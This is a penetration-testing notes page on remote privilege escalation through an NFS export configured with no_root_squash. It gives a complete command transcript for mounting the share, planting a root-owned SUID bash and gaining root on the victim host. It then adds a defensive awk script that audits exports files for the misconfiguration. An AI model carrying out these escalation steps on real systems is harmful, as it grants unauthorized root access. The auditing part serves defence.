# NFS - N/A

## no\_root\_squash <mark style="color:red;">privilege escalation</mark> (remote)

By default, NFS maps requests from the root user to the non-privileged user `nfsnobody`; the root privileges are "squashed". With `no_root_squash` configured, requests are not squashed, meaning any client that mounts this directory can **read, write and modify files within the directory as root** on the host machine.

This is the remote version of this privilege escalation: no explicit host is configured in `/etc/exports`, so all (`*`) hosts are allowed to mount the NFS share.

```bash
## Confirm that 'no_root_squash' is configured
[lowPrivUser@victimHost nfs]$ cat /etc/exports
/share/nfs	*(rw,insecure,sync,no_subtree_check,no_root_squash)

## Low privileged account isn't able to read nfs directory
[lowPrivUser@victimHost share]$ ls -al
drwxr-xr-x   7 root     root        75 Jun 23 08:56 .
dr-xr-xr-x. 20 root     root       278 Aug 25  2022 ..
drwxr-x---   2 admUser  admUser    189 Feb 19  2021 nfs

## Mount share from local attack machine
➜  /tmp mkdir pe
➜  /tmp mount -t nfs victimHost:/share/nfs /tmp/pe
➜  /tmp cd pe
➜  pe ls -al 
total 5684
drwxr-x---  2 void void     189 Feb 19  2021 .
drwxrwxrwt 21 root root   69632 Jul  3 12:49 ..
-rw-r--r--  1 void void     823 Feb 19  2021 secret.conf

## Change privileges of mounted share so lowPrivUser can copy /bin/bash to share
➜  /tmp chmod 777 pe

[lowPrivUser@victimHost share]$ cd nfs
[lowPrivUser@victimHost nfs]$ cp /bin/bash .

## Change owner and set SUID bit on binary (chown first, because chown clears the SUID bit). Execute on victimHost to escalate privileges
➜  pe chown root:root bash
➜  pe chmod +s bash

[lowPrivUser@victimHost nfs]$ ./bash -p
bash-4.4# id
uid=1651499380(lowPrivUser) gid=1102800513(domain users) euid=0(root) egid=0(root) groups=0(root)

## Cleaning
➜  pe rm bash
➜  pe cd ..
➜  /tmp chmod 750 pe
💀➜  /tmp umount pe
```
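
A defensive check for the misconfiguration shown above, as an added example that is not part of the original notes: it parses an `exports(5)` file and reports every client entry where root is left unsquashed, rating wildcard (`*`) clients highest. It goes slightly beyond the single line on this page by also handling per-line default option lists (`-opts`) and a later option overriding an earlier one; the function names, severity labels and sample entries are assumptions constructed for illustration.

```bash
#!/usr/bin/env bash
# Added example: audit an exports(5) file for clients that keep root privileges.
# Output: one line per finding -> SEVERITY<TAB>path<TAB>client<TAB>reason

audit_exports() {
  # $1 = exports file to read ("-" for stdin, default /etc/exports)
  awk '
    /^[ \t]*(#|$)/ { next }                    # skip comment and blank lines
    {
      sub(/[ \t]*#.*$/, "")                    # strip trailing comment
      defaults = ""
      for (i = 2; i <= NF; i++) {
        if ($i ~ /^-/) { defaults = substr($i, 2); continue }  # "-opts" defaults
        client = $i; opts = ""
        p = index($i, "(")
        if (p > 0) {
          client = substr($i, 1, p - 1)
          opts = substr($i, p + 1); sub(/\)$/, "", opts)
        }
        if (client == "") client = "*"         # "(opts)" without a host = everyone
        squash = 1; rw = 0                     # exports defaults: root_squash, ro
        n = split(defaults "," opts, o, ",")
        for (j = 1; j <= n; j++) {             # later options override earlier ones
          if (o[j] == "no_root_squash") squash = 0
          else if (o[j] == "root_squash") squash = 1
          else if (o[j] == "rw") rw = 1
          else if (o[j] == "ro") rw = 0
        }
        if (squash) continue
        sev = (client == "*") ? "HIGH" : "MEDIUM"   # any host may mount as root
        printf "%s\t%s\t%s\tno_root_squash,%s\n", sev, $1, client, (rw ? "rw" : "ro")
      }
    }
  ' "${1:-/etc/exports}"
}

# Constructed sample input; the first entry mirrors the export shown on this page.
sample_exports() {
  cat <<'EOF'
# constructed sample exports file
/share/nfs   *(rw,insecure,sync,no_subtree_check,no_root_squash)
/srv/backup  10.0.0.5(ro,no_root_squash) 10.0.0.0/24(rw,root_squash)
/srv/home    -no_root_squash,rw admin01(sync) *(root_squash,ro)
/srv/pub     *(ro,sync)   # read-only and squashed: not reported
EOF
}

sample_exports | audit_exports -
```

On a real server, run `audit_exports` with no argument to read `/etc/exports`; any `HIGH` line should have `no_root_squash` removed or the client list restricted, followed by `exportfs -ra`.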
